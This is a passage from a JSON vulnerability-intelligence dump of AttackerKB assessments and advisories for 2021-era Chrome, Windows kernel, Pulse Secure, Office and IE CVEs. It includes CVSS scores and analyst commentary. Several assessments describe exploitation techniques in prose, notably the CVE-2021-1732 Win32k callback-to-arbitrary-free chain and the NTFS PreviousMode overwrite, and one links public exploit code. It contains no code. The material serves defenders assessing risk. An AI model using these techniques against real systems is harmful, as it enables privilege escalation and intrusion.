In any case, at the time that code was released the bug was still unpatched, which led researchers at Kaspersky to conclude that it\u2019s likely attackers used the code from <https://github.com/avboy1337/1195777-chrome0day> in their attack.\n\nOtherwise this is your typical V8 type confusion bug. V8 seems to have had quite a few type confusion bugs in the past so this is nothing too new. If you want to limit exposure, disable JavaScript in your browser on untrusted sites, which will help prevent users from being exploited by these types of attacks as most of them rely on JavaScript to set up the environment in Chrome appropriately. That being said, disabling JavaScript will break most sites so take this with a grain of salt :)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-04-28T00:00:00", "id": 
"AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "href": "https://attackerkb.com/topics/fLcfbPxB38/cve-2021-21224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:10:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-17T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-31T20:18:07", "description": "Windows NTFS Elevation of Privilege Vulnerability \nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nAdditionally, an attacker could convince a local user to open a malicious file. The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:04pm UTC reported:\n\nThis is a heap buffer overflow in `ntfs.sys`, one of the Windows kernel drivers, which was patched in June 2021. Heap vulnerabilities in the kernel are notoriously unreliable and hard to exploit, particularly given recent mitigations in Windows 8 and then later in Windows 10 that have introduced additional randomness to the kernel heap as well as additional state checks that will result in Windows terminating immediately if data does not look to be valid. 
Therefore realize that whilst this exploit has been exploited in the wild, I would imagine the reliability may be questionable or there may have been considerable work done behind the scenes to make the exploit more reliable.\n\nIn any case, the affected function is `NtfsQueryEaUserEaList()` in `ntfs.sys` which processes a list of extended attributes (this is where the `ea` part of the function name comes from) for a file and saves the retrieved values to a buffer. The problem here though is that users can make a Windows system call to access this function and `NtfsQueryEaUserEaList()` and it\u2019s possible to control the size of the output buffer. However the output buffer\u2019s size has to be 32 bit aligned. This causes an issue as whilst the code does check to make sure the output buffer can hold the content of the extended attribute list with padding, it doesn\u2019t check for integer underflows, meaning that the check is done as though the number was an unsigned integer, yet when copying memory it\u2019s treated as a signed integer, which can result in the number underflowing and becoming a large positive number, such that a lot of memory is copied into a very small buffer.\n\nThis is a particularly interesting case as most of the time when one combines an integer underflow/overflow with a heap buffer vulnerability, things don\u2019t tend to pan out so well due to the user corrupting too much memory to reliably control the heap. This can cause issues later on when Windows checks the heap state and suddenly finds everything is trashed, resulting in a BSOD if one corrupts kernel heap memory. 
For this reason, I\u2019m interested to see how the attackers actually managed to accurately control heap memory in this scenario to exploit the vulnerability.\n\nFrom the advisory we are given some hints that the Windows Notification Facility (WNF) was used along with this vulnerability to get arbitrary memory read and write primitives, which is a new kernel exploitation strategy I have not heard about before. It appears this was also new to Kaspersky as well as they mention they will be publishing more information about this technique in the future.\n\nAdditionally, showcasing the sophistication of the attackers who exploited this vulnerability, they also used a rarely used `PreviousMode` overwrite instead of overwriting the `Token` field of the `EPROCESS` structure to steal the token. As mentioned at <https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>, this field controls which mode the kernel was in prior to performing a system call. 
This can allow an attacker to perform sensitive actions by essentially tricking the OS into thinking a system call was made from kernel mode when in reality it was not.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "href": "https://attackerkb.com/topics/Xixbnqn9qC/cve-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-15T02:09:19", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. 
When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**awesom3alex** at April 21, 2021 2:01pm UTC reported:\n\nPulse Secure Pulse Connect Secure 9.1.R.11.3 and earlier are affected by an authenticated bypass vulnerability, CVE-2021-22893, when exploited it is very likely the threat actor can achieve remote code execution. Exploitation has been observed by APT 5 (UNC2630) and UNC2717.\n\nA Proof-of-Concept exploit is not publicly available.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-27T00:00:00", "id": "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "href": "https://attackerkb.com/topics/PqQGYGwWdM/cve-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-09T20:11:00", "description": "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft 
Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka \u201cMicrosoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:44pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 \n\n * Associated Malware: FINSPY, LATENTBOT, Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0199", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-07-27T00:00:00", "id": "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "href": "https://attackerkb.com/topics/1wEJlwFAYV/cve-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-17T05:06:46", "description": "This CVE is the result of a patch bypass for CVE-2020-0986, reported to Microsoft by Kaspersky in December 2019 and patched in June 2020. Google Project Zero researcher Maddie Stone notified Microsoft on September 24, 2020 that the fix for Kaspersky\u2019s reported vulnerability was incomplete. CVE-2020-17008 was [published on December 23, 2020](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) as part of Google\u2019s 90-day disclosure deadline.\n\nNotably, CVE-2020-0986 was exploited in the wild as part of [Operation PowerFall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). 
Stone\u2019s tweet thread on the incomplete patch [is here](<https://twitter.com/maddiestone/status/1341781307508969473>).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-17008 splWOW64 Elevation of Privilege Patch Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-30T00:00:00", "id": "AKB:2BD24459-EE7D-4EB8-92A6-7C77689BCC8D", "href": "https://attackerkb.com/topics/cKeyeWef0b/cve-2020-17008-splwow64-elevation-of-privilege-patch-bypass", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-21T18:19:16", "description": "Internet Explorer Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 1:20pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is 
[exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\n**gwillcox-r7** at March 11, 2021 5:57pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26411", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-03-18T00:00:00", "id": "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "href": "https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T23:01:58", "description": "Scripting Engine Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 14, 2021 10:33am UTC reported:\n\n## Details\n\nThe 
vulnerability affects Internet Explorer 11 on all Windows versions. It is located in the `jscript9.dll` library, which is used to execute JavaScript.\n\nPossible attack vectors:\n\n * website content \n\n * ActiveX components in office documents \n\n\nGoogle Project Zero released a PoC on 13.05.2021, which triggers the vulnerability and causes a crash. At the time of writing I could not find any weaponized exploit.\n\nThe CVSS rating of the vulnerability differs between Windows desktop versions and server versions. In server versions the CVSS _Privileges Required_ is set to _High_. Desktop versions are rated with CVSS _None_. The reason could be that IE _enhanced protection mode_ is disabled on Windows desktop versions and enabled on server versions by default.\n\n## Rating explanation\n\nMy rating of the exploitability score was affected by the availability of the PoC and the Microsoft exploitability rating. In 2020, Operation PowerFall was using a similar vulnerability (CVE-2020-1380) in IE. I expect to see exploits for CVE-2021-26419 in a similar context.\n\nAttackers might gain direct control over the host after exploitation without a sandbox escape. IE 11 does have an _enhanced protected mode (EPM)_, which runs IE in an AppContainer and acts as a sandbox. 
EPM was introduced with Windows 8 and is disabled by default on Windows desktop versions.\n\n## Sources\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419> \n\n * <https://threatpost.com/wormable-windows-bug-dos-rce/166057/> \n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=2157> \n\n * <https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/> \n\n * <https://securityintelligence.com/internet-explorer-ie-10-enhanced-protected-mode-epm-sandbox-research/> \n\n * <https://docs.microsoft.com/en-us/troubleshoot/browsers/enhanced-protected-mode-add-on-compatibility>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26419"], "modified": "2021-05-18T00:00:00", "id": "AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "href": "https://attackerkb.com/topics/3ko2JYsW6g/cve-2021-26419", "cvss": {"score": 7.6, "vector": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-25T20:07:54", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. 
By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. 
Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. 
If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-1732", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-04T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": 
"https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:33", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-28310)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28310"], "modified": "2021-04-13T00:00:00", "id": "CPAI-2021-0223", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:24", "description": "An information disclosure vulnerability exists in Microsoft Windows. 
